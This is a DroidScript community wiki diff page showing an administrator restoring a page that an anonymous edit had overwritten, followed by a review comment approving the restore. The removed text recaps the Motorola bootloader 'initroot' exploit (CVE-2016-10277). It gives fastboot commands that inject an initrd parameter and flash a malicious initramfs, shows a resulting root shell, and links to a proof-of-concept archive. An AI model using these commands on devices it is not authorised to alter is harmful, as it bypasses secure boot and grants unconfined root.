DroidScript wiki

Unofficial documentation by the community (formerly AndroidScript)


built_in:start

Differences

This shows you the differences between two versions of the page.

built_in:start [2018/12/30 13:41]
182.1.63.175 [Built-in features - DroidScript API]
built_in:start [2018/12/30 17:07] (current)
administrator old revision restored (2018/12/30 05:23)
Line 1: Line 1:
-Sources: +======Built-in features - DroidScript API====== ​
-https://​alephsecurity.com/​2017/​08/​30/​untethered-initroot/ +
-https://​github.com/​alephsecurity/​initroot+
  
-initroot: Motorola Bootloader Kernel Cmdline Injection Secure Boot & Device Locking Bypass (CVE-2016-10277) 
  
-By Roee Hay / Aleph Research, HCL Technologies 
- 
-Recap of the Vulnerability and the Tethered-jailbreak 
- 
-1. Vulnerable versions of the Motorola Android Bootloader (ABOOT) allow for kernel command-line injection. 
-2. Using a proprietary fastboot OEM command, only available in the Motorola ABOOT, we can inject, through USB, a parameter named initrd which allows us to force the Linux kernel to populate initramfs into rootfs from a specified physical address. 
-3. We can abuse the ABOOT download functionality in order to place our own malicious initramfs at a known physical address, named SCRATCH_ADDR (see here for a list of devices). 
-4. Exploiting the vulnerability allows the adversary to gain unconfined root shell. 
-5. Since the initramfs payload is injected into RAM by the adversary, the vulnerability must be re-exploited on every reboot. 
-For example, here is a successful run of the exploit on cedric (Moto G5) 
- 
-$ fastboot oem config fsg-id "a initrd=0xA2100000,​1588598" ​ 
-$ fastboot flash aleph initroot-cedric.cpio.gz ​ 
-$ fastboot continue 
- 
-$ adb shell  
-cedric:/ # id 
-uid=0(root) gid=0(root) groups=0(root),​1004(input),​1007(log),​1011(adb),​1015(sdcard_rw),​1028(sdcard_r),​3001(net_bt_admin),​3002(net_bt),​3003(inet),​3006(net_bw_stats),​3014(readproc) context=u:​r:​kernel:​s0 
-cedric:/ # getenforce 
-Permissive 
-cedric:/ # 
- 
- 
-Proof of Concept: 
-https://​github.com/​offensive-security/​exploitdb-bin-sploits/​raw/​master/​bin-sploits/​42601.zip 
- 
-            ​ 
 ====Links==== ====Links====
 ^App and Layout^ ^App and Layout^
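Review bot: restoring the 2018/12/30 05:23 revision is the right call for this hunk: the content removed by the restore (the initroot / CVE-2016-10277 writeup, its fastboot and adb shell transcript, and the link to a proof-of-concept archive) is unrelated to the DroidScript built-in API and had replaced the page's own heading, so the restore brings back the `======Built-in features - DroidScript API======` title while the `====Links====` section and the `^App and Layout^` table are unchanged on both sides. Since the overwritten revision came from the anonymous address 182.1.63.175 with a misleading edit summary ("Built-in features - DroidScript API"), it is worth checking that address's other recent edits on this wiki for the same pattern and considering edit protection for the page.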
built_in/start.txt · Last modified: 2018/12/30 17:07 by administrator